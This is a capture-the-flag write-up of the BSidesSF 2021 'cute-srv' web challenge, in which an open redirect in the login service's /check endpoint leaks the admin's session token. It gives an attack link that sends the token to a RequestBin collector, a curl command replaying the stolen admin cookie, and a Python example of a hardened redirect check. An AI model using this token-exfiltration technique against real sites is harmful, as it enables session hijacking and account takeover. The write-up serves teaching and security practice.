Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv) for the writeup with images.

---

This challenge was fun, cute and straightforward once the bug is found.

First we're presented with a page of cute photos, and the nav bar lets us `Login` or `Submit` a new image for review.

Looking in the source, there's a `/flag.txt` route which must be the goal of the challenge, but when visiting it we get the message `'Not Authorized'`.

If we visit `Login` we can click the only link available, and it will automatically log us in and redirect us to the main page.

On `/submit` we can submit a URL which the admin will visit. This is typical of many CSRF challenges, so we can start by checking the User-Agent and other features of the admin's request when it visits our link, pointing it at a server we own or at something like [https://requestbin.io/](https://requestbin.io/).

Even if we find XSS, the site uses HttpOnly cookies, so we probably need to find something else.

Checking out the `Login` route again while watching the requests, it does something interesting. When requesting `/check` from the login service, the service appends the session token to the URL it redirects to, but does not restrict what that URL (the `continue` parameter) can be: an open redirect. Using this bug we can make the admin user send their own session token to our site instead.

We can use RequestBin again to steal the session token `authtok`, submitting
this link to the admin:

```
https://loginsvc-0af88b56.challenges.bsidessf.net/check?continue=https%3A%2F%2Frequestbin.io%2F1oar7lu1
```
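The root cause is that `/check` redirects to whatever `continue` says, and carries the token along. As an added example (not the challenge's own code), the Python below contrasts that weak behaviour with a hardened version that only redirects to a same-origin path or an allowlisted https host. The allowlist host `cutesrv.example`, the collector host `requestbin.example`, and the `authtok` query-parameter name are assumptions for the example, not values confirmed by the challenge source.

```python
from urllib.parse import urlparse, urlencode

# Hosts the login service may redirect back to. This allowlist is an assumption
# for the example; the real challenge's configuration is not shown.
ALLOWED_HOSTS = {"cutesrv.example"}
DEFAULT_TARGET = "/"


def vulnerable_redirect_target(continue_url: str) -> str:
    """The weak behaviour: trust the `continue` parameter as-is, so whichever
    origin was placed there receives the redirect and the token appended to it."""
    return continue_url or DEFAULT_TARGET


def safe_redirect_target(continue_url: str) -> str:
    """Hardened: accept only a same-origin absolute path, or an https URL whose
    host is on the allowlist. Anything else falls back to DEFAULT_TARGET."""
    if not continue_url:
        return DEFAULT_TARGET
    parsed = urlparse(continue_url)
    if parsed.scheme == "" and parsed.netloc == "":
        # A relative path. urlparse already gives "//host" a netloc, so it does
        # not land here; the "//" check is belt-and-braces. "/\host" is rejected
        # because some browsers normalise the backslash to "//host".
        if continue_url.startswith("/") and not continue_url.startswith(("//", "/\\")):
            return continue_url
        return DEFAULT_TARGET
    # Absolute URL: require https and an allowlisted host. .hostname strips any
    # "user:pass@" prefix and lowercases, so "allowed@evil" and case tricks fail.
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        return DEFAULT_TARGET
    return continue_url


def build_check_redirect(continue_url: str, authtok: str, hardened: bool = True) -> str:
    """Build the Location value /check would send. The token is carried as a query
    parameter named `authtok`; that name and placement are assumed for the example."""
    if hardened:
        target = safe_redirect_target(continue_url)
    else:
        target = vulnerable_redirect_target(continue_url)
    sep = "&" if "?" in target else "?"
    return target + sep + urlencode({"authtok": authtok})


if __name__ == "__main__":
    # Constructed inputs: an attacker-controlled collector URL and a dummy token.
    collector = "https://requestbin.example/collector"
    for hardened in (False, True):
        print("hardened" if hardened else "vulnerable", build_check_redirect(collector, "DUMMY_TOKEN", hardened))
```

With `hardened=False` the token goes to the collector host; with `hardened=True` the same input is replaced by `/`, so the token only ever travels back to the application's own origin.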

Now we can reach the `/flag.txt` route which is only available to the admin:

```
curl https://cutesrv-0186d981.challenges.bsidessf.net/flag.txt \
-b 'loginsid=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhdXRodG9rIiwiZXhwIjoxNjE4NDYyMjkyLCJpYXQiOjE2MTU3ODM4OTIsImlzcyI6ImxvZ2luc3ZjIiwibmJmIjoxNjE1NzgzODkyLCJzdWIiOiJhZG1pbiJ9.iA3lgwhmhOPNKh0_Wxmi923EOWdcUWcS-cIA_lxPhtExEGMeGkep3zweJ-MXtFyOwiDnMZ7Uuyuth9mFQ0lpMQ'
```

And we get the Flag!

```
FLAG: CTF{i_hope_you_made_it_through_2020_okay}
```

Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#cute-srv).